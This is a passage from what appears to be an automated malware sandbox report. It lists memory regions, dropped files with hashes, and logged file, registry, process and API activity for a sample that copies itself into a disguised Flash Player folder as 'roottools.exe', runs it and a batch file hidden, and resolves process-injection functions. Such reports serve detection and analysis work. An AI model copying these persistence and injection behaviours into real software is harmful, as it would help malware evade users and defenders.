dhcpcsvc.dll	0x74fd0000	0x74fe1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x75630000	0x7566afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x75670000	0x75685fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
secur32.dll	0x75690000	0x75697fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iphlpapi.dll	0x756b0000	0x756cbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winnsi.dll	0x756e0000	0x756e6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x75800000	0x7580bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x75810000	0x7586ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x758c0000	0x759bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759c0000	0x75acffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x75ad0000	0x75ad4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75ae0000	0x75c3bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x75c40000	0x75e3afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x75e70000	0x75f1bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x75f20000	0x76014fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x760b0000	0x7610ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76110000	0x761acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x761b0000	0x7623efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x76240000	0x7635cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x76360000	0x7636bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x76370000	0x763c6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76570000	0x7663bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x76640000	0x76685fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x76690000	0x767c5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x767d0000	0x767e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x767f0000	0x767f5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76800000	0x768effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x768f0000	0x768f9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76950000	0x769dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x76a70000	0x776b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x77740000	0x777dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x777e0000	0x77814fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00000000778b0000	0x778b0000	0x779a9fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x00000000779b0000	0x779b0000	0x77acefff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77ad0000	0x77c78fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77cb0000	0x77e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\aetadzjz\appdata\local\temp\upd9dba1b78.bat	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855		File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\upd9dba1b78.bat	0.21 KB (216 bytes)	MD5: 98de219891ef24cceaa12d1c41436654 SHA1: 7ad5ad583dfd70ed21dd2acef592c931def67f0a SHA256: 14facf8fc3da422ce17a7695d1261c86078c97436ea643bc4d153aeda0904a88		File Actions Show Properties Download

Host Behavior

File (29)

Operation	Filename	Additional Information	Count	Logfile
Create	\??\C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe	desired_access = FILE_READ_EA, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\\.\pipe\D3B6C4DE8CF79A854B549EE232F08C89	desired_access = GENERIC_WRITE, GENERIC_READ	2	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	\??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	desired_access = FILE_WRITE_EA, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys	desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	2	Fn
Get Info	STD_INPUT_HANDLE	type = file_type	1	Fn
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Get Info	STD_ERROR_HANDLE	type = file_type	1	Fn
Get Info	\??\C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe	type = extended	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe	type = size, size_out = 196608	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming	type = time	1	Fn
Open	STD_INPUT_HANDLE	-	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Read	\\.\pipe\D3B6C4DE8CF79A854B549EE232F08C89	size = 4, size_out = 4	3	Fn Data
Read	\\.\pipe\D3B6C4DE8CF79A854B549EE232F08C89	size = 766, size_out = 766	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe	size = 196608, size_out = 196608	1	Fn Data
Write	\\.\pipe\D3B6C4DE8CF79A854B549EE232F08C89	size = 4	2	Fn Data
Write	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	size = 196608	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat	size = 216	1	Fn Data

Registry (6)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	-	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	value_name = InstallDate, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	value_name = DigitalProductId	1	Fn

Process (2)

Operation	Process	Additional Information	Success	Count	Logfile
Create	"C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe"	os_pid = 0x7e8, creation_flags = CREATE_DEFAULT_ERROR_MODE, show_window = SW_HIDE		1	Fn
Create	"C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat"	os_pid = 0x6a4, creation_flags = CREATE_DEFAULT_ERROR_MODE, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE		1	Fn

Module (568)

Operation	Module	Additional Information	Count	Logfile
Load	OLEAUT32.DLL	base_address = 0x761b0000	1	Fn
Load	SXS.DLL	base_address = 0x74e30000	1	Fn
Load	KERNEL32	base_address = 0x759c0000	1	Fn
Load	kernel32	base_address = 0x759c0000	15	Fn
Load	shell32	base_address = 0x76a70000	2	Fn
Load	NTDLL	base_address = 0x77cb0000	1	Fn
Load	user32	base_address = 0x758c0000	3	Fn
Load	ntdll	base_address = 0x77cb0000	2	Fn
Load	IPHlpApi	base_address = 0x756b0000	1	Fn
Load	User32	base_address = 0x758c0000	1	Fn
Load	KERNEL32.dll	base_address = 0x759c0000	101	Fn
Load	USER32.dll	base_address = 0x758c0000	19	Fn
Load	CRYPT32.dll	base_address = 0x76240000	2	Fn
Load	ADVAPI32.dll	base_address = 0x77740000	39	Fn
Load	SHELL32.dll	base_address = 0x76a70000	3	Fn
Load	SHLWAPI.dll	base_address = 0x76370000	20	Fn
Load	PSAPI.DLL	base_address = 0x75ad0000	1	Fn
Load	ole32.dll	base_address = 0x75ae0000	6	Fn
Load	GDI32.dll	base_address = 0x76950000	8	Fn
Load	WININET.dll	base_address = 0x75f20000	10	Fn
Load	urlmon.dll	base_address = 0x76690000	1	Fn
Load	OLEAUT32.dll	base_address = 0x761b0000	1	Fn
Load	Secur32.dll	base_address = 0x75690000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x759c0000	2	Fn
Get Handle	c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe	base_address = 0x400000	2	Fn
Get Handle	c:\windows\syswow64\oleaut32.dll	base_address = 0x761b0000	1	Fn
Get Handle	c:\windows\syswow64\ole32.dll	base_address = 0x75ae0000	1	Fn
Get Handle	c:\windows\syswow64\user32.dll	base_address = 0x758c0000	1	Fn
Get Handle	c:\windows\syswow64\ntdll.dll	base_address = 0x77cb0000	2	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, size = 260	3	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260	3	Fn
Get Filename	c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe	process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, size = 260	1	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsTNT, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x759d5235	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = OleLoadPictureEx, address_out = 0x762170a1	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = DispCallFunc, address_out = 0x761c3dcf	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = LoadTypeLibEx, address_out = 0x761c07b7	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = UnRegisterTypeLib, address_out = 0x761e1ca9	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = CreateTypeLib2, address_out = 0x761c8e70	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDateFromUdate, address_out = 0x761c7684	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarUdateFromDate, address_out = 0x761ccc98	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = GetAltMonthNames, address_out = 0x761f903a	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNumFromParseNum, address_out = 0x761c6231	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarParseNumFromStr, address_out = 0x761c5fea	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromR4, address_out = 0x761d3f94	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromR8, address_out = 0x761d4e9e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromDate, address_out = 0x761fdb72	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromI4, address_out = 0x761e2a8c	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromCy, address_out = 0x761fd737	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarR4FromDec, address_out = 0x761fe015	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = GetRecordInfoFromTypeInfo, address_out = 0x761fcc3d	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = GetRecordInfoFromGuids, address_out = 0x761fd1c4	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayGetRecordInfo, address_out = 0x761fd48c	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArraySetRecordInfo, address_out = 0x761fd4c6	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayGetIID, address_out = 0x761fd509	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArraySetIID, address_out = 0x761ce7bb	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayCopyData, address_out = 0x761ce496	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayAllocDescriptorEx, address_out = 0x761cddf1	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayCreateEx, address_out = 0x761fd53f	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormat, address_out = 0x76202055	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatDateTime, address_out = 0x762020ea	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatNumber, address_out = 0x76202151	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatPercent, address_out = 0x762021f5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatCurrency, address_out = 0x76202288	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarWeekdayName, address_out = 0x76202335	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMonthName, address_out = 0x762023d5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAdd, address_out = 0x761d5934	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAnd, address_out = 0x761d5a98	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCat, address_out = 0x761d59b4	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDiv, address_out = 0x7622e405	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarEqv, address_out = 0x7622ef07	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarIdiv, address_out = 0x7622f00a	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarImp, address_out = 0x7622ef47	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMod, address_out = 0x7622f15e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMul, address_out = 0x7622dbd4	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarOr, address_out = 0x7622ecfa	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarPow, address_out = 0x7622ea66	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarSub, address_out = 0x7622d332	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarXor, address_out = 0x7622ee2e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAbs, address_out = 0x7622ca11	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFix, address_out = 0x7622cc5f	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarInt, address_out = 0x7622cde7	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNeg, address_out = 0x7622c802	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNot, address_out = 0x7622ec66	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarRound, address_out = 0x7622d155	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCmp, address_out = 0x761cb0dc	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecAdd, address_out = 0x761e5f3e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecCmp, address_out = 0x761d4fd0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBstrCat, address_out = 0x761d0d2c	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCyMulI4, address_out = 0x761e59ed	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBstrCmp, address_out = 0x761bf8b8	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstanceEx, address_out = 0x75b29d4e	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CLSIDFromProgIDEx, address_out = 0x75af0782	1	Fn
Get Address	c:\windows\syswow64\sxs.dll	function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x74e77685	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetSystemMetrics, address_out = 0x758d7d2f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MonitorFromWindow, address_out = 0x758e3150	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MonitorFromRect, address_out = 0x758fe7a0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MonitorFromPoint, address_out = 0x758e5281	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EnumDisplayMonitors, address_out = 0x758e451a	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetMonitorInfoA, address_out = 0x758e4413	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadProcessMemory, address_out = 0x759ecfcc	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumResourceTypesA, address_out = 0x75a50efd	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = Shell_NotifyIconA, address_out = 0x76cb8af2	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = ZwSetInformationProcess, address_out = 0x77ccfb18	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x759d10ff	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetDesktopWindow, address_out = 0x758e0a19	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x77cde026	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x759d11a9	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x759d1b00	2	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtYieldExecution, address_out = 0x77ccff2c	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtProtectVirtualMemory, address_out = 0x77cd0028	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x759d53c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x759d1282	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x759d1410	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x759d3ed3	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSize, address_out = 0x759d196e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnmapViewOfFile, address_out = 0x759d1826	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtectEx, address_out = 0x75a545bf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLongPathNameA, address_out = 0x75a5437f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x759ed802	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetAdaptersInfo, address_out = 0x756b9263	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAllocEx, address_out = 0x759ed9b0	2	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteA, address_out = 0x76cb7078	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EnumWindows, address_out = 0x758dd1cf	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x758d9a55	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EnumThreadWindows, address_out = 0x758e3961	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateThread, address_out = 0x759d7a2f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x759d49d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x759d89b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77cf1f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetNativeSystemInfo, address_out = 0x759e10b5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x759d34d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapDestroy, address_out = 0x759d35b7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x759d2d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x77ce45f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x759ddd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x759d14e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SystemTimeToFileTime, address_out = 0x759d5a7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalMemoryStatusEx, address_out = 0x759fd4c4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x759d103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x759d170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedIncrement, address_out = 0x759d1400	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTime, address_out = 0x759d5a96	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFreeEx, address_out = 0x759ed9c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsBadReadPtr, address_out = 0x759fd075	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiW, address_out = 0x759ed5cd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenMutexW, address_out = 0x759d5151	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x759ece2e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x759d17ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x759d469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x759d1809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExW, address_out = 0x759d1ae5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DuplicateHandle, address_out = 0x759d1886	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleA, address_out = 0x759d1245	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AddVectoredExceptionHandler, address_out = 0x77d2742b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x759d7a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x759d11f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x759f830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiA, address_out = 0x759d3e8e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsWow64Process, address_out = 0x759d195e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstChangeNotificationW, address_out = 0x759ed851	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextChangeNotification, address_out = 0x759f5c1e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessInJob, address_out = 0x759fc7ea	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateRemoteThread, address_out = 0x75a5416b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateNamedPipeW, address_out = 0x75a5414b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DisconnectNamedPipe, address_out = 0x75a541df	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ConnectNamedPipe, address_out = 0x75a540fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x759d5371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeW, address_out = 0x759d418b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultUILanguage, address_out = 0x759d44ab	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x759f3b92	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableW, address_out = 0x759d1b48	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x759d17d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSection, address_out = 0x77ce2c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeZoneInformation, address_out = 0x759d465a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x759d192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileAttributesW, address_out = 0x759ed4f7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x759d1986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileTime, address_out = 0x759d4407	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReleaseMutex, address_out = 0x759d111e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77cd2270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x759d4950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileTime, address_out = 0x759eecbb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveDirectoryW, address_out = 0x75a544cf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x759d1856	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExpandEnvironmentStringsW, address_out = 0x759d4173	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x759d54ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x77cd22b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileAttributesW, address_out = 0x759d1b18	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x759d4442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenEventW, address_out = 0x759d15d6	1	Fn
